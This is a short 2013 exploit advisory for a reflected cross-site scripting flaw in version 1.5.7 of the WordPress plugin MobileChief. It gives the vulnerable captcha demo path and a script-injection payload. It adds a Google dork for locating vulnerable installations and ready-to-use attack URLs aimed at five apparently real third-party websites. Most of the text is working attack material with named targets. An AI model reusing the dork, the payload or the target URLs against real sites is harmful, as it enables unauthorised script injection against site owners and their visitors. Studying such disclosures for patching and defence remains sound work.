====================================================================
# Exploit Title : Wordpress MobileChief - Mobile Site Builder plugin Cross
site scripting

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : http://wordpress.org

# Plugin Link :
http://downloads.wordpress.org/plugin/mobilechief-mobile-site-creator.1.5.7.zip

# Version : 1.5.7

# Google Dork : inurl:wp-content/plugins/mobilechief-mobile-site-creator

# Date: 2013/10/26

# Tested on: Windows 7
#
------------------------------------------------
#
# Exploit :
#
# Location :
http://site.com/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/[xss]
#
# Script For Test : "/><script>alert(1);</script>
#
------------------------------------------------
#
# Demo:
#
#
http://aactionhomeservices.net/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.bsusos.com/main/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.happyrecyclers.com/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.floridanpalace.com/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.bnhre.net/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
######################
discovered by : ACC3SS
######################